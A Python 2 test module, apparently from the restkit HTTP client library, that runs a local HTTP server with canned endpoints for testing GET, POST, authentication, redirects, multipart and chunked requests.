# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import base64
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import cgi
import os
import socket
import tempfile
import threading
import unittest
import urlparse
try:
from urlparse import parse_qsl, parse_qs
except ImportError:
from cgi import parse_qsl, parse_qs
import urllib
from restkit.util import to_bytestring
HOST = 'localhost'
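# derive a per-process port in the range 1024-32023 so parallel test runs are unlikely to collide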
PORT = (os.getpid() % 31000) + 1024
class HTTPTestHandler(BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.auth = 'Basic ' + base64.encodestring('test:test')[:-1]
self.count = 0
BaseHTTPRequestHandler.__init__(self, request, client_address, server)
def do_GET(self):
self.parsed_uri = urlparse.urlparse(urllib.unquote(self.path))
self.query = {}
for k, v in parse_qsl(self.parsed_uri[4]):
self.query[k] = v.decode('utf-8')
path = self.parsed_uri[2]
if path == "/":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "welcome")
elif path == "/unicode":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, u"éàù@")
elif path == "/json":
content_type = self.headers.get('content-type', 'text/plain')
if content_type != "application/json":
self.error_Response("bad type")
else:
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/éàù":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/test":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/query":
test = self.query.get("test", False)
if test and test == "testing":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/qint":
test = self.query.get("test", False)
if test and test == "1":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/auth":
extra_headers = [('Content-type', 'text/plain')]
            if 'Authorization' not in self.headers:
realm = "test"
extra_headers.append(('WWW-Authenticate', 'Basic realm="%s"' % realm))
self._respond(401, extra_headers, "")
else:
auth = self.headers['Authorization'][len('Basic')+1:]
auth = base64.b64decode(auth).split(':')
if auth[0] == "test" and auth[1] == "test":
self._respond(200, extra_headers, "ok")
else:
self._respond(403, extra_headers, "niet!")
elif path == "/redirect":
extra_headers = [('Content-type', 'text/plain'),
('Location', '/complete_redirect')]
self._respond(301, extra_headers, "")
elif path == "/complete_redirect":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/redirect_to_url":
extra_headers = [('Content-type', 'text/plain'),
('Location', 'http://localhost:%s/complete_redirect' % PORT)]
self._respond(301, extra_headers, "")
elif path == "/pool":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
else:
self._respond(404,
[('Content-type', 'text/plain')], "Not Found" )
def do_POST(self):
self.parsed_uri = urlparse.urlparse(self.path)
self.query = {}
for k, v in parse_qsl(self.parsed_uri[4]):
self.query[k] = v.decode('utf-8')
path = self.parsed_uri[2]
extra_headers = []
if path == "/":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', '-1'))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/bytestring":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', '-1'))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/unicode":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', '-1'))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/json":
content_type = self.headers.get('content-type', 'text/plain')
if content_type != "application/json":
self.error_Response("bad type: %s" % content_type)
else:
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/empty":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
if body == "":
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/query":
test = self.query.get("test", False)
if test and test == "testing":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/form":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
form = parse_qs(body)
if form['a'] == ["a"] and form["b"] == ["b"]:
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/multipart":
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
content_length = int(self.headers.get('Content-length', 0))
if ctype == 'multipart/form-data':
req = cgi.parse_multipart(self.rfile, pdict)
body = req['t'][0]
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, body)
else:
self.error_Response()
elif path == "/1M":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, str(len(body)))
elif path == "/large":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-Type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
extra_headers.append(('Content-Length', str(len(body))))
self._respond(200, extra_headers, body)
elif path == "/list":
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
extra_headers.append(('Content-Length', str(len(body))))
self._respond(200, extra_headers, body)
elif path == "/chunked":
te = (self.headers.get("transfer-encoding") == "chunked")
if te:
body = self.rfile.read(29)
extra_headers.append(('Content-Length', "29"))
self._respond(200, extra_headers, body)
else:
self.error_Response()
else:
self.error_Response('Bad path')
do_PUT = do_POST
def do_DELETE(self):
if self.path == "/delete":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, '')
else:
self.error_Response()
def do_HEAD(self):
if self.path == "/ok":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, '')
else:
self.error_Response()
def error_Response(self, message=None):
req = [
('HTTP method', self.command),
('path', self.path),
]
if message:
req.append(('message', message))
body_parts = ['Bad request:\r\n']
for k, v in req:
body_parts.append(' %s: %s\r\n' % (k, v))
body = ''.join(body_parts)
self._respond(400, [('Content-type', 'text/plain'),
('Content-Length', str(len(body)))], body)
def _respond(self, http_code, extra_headers, body):
self.send_response(http_code)
keys = []
for k, v in extra_headers:
self.send_header(k, v)
keys.append(k)
if body:
body = to_bytestring(body)
#if body and "Content-Length" not in keys:
# self.send_header("Content-Length", len(body))
self.end_headers()
self.wfile.write(body)
self.wfile.close()
def finish(self):
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
self.rfile.close()
server_thread = None
def run_server_test():
global server_thread
if server_thread is not None:
return
server = HTTPServer((HOST, PORT), HTTPTestHandler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.setDaemon(True)
server_thread.start()
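# Illustrative usage: test modules call run_server_test() once before issuing
# requests against http://HOST:PORT; the daemonized server thread exits with
# the test process.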
|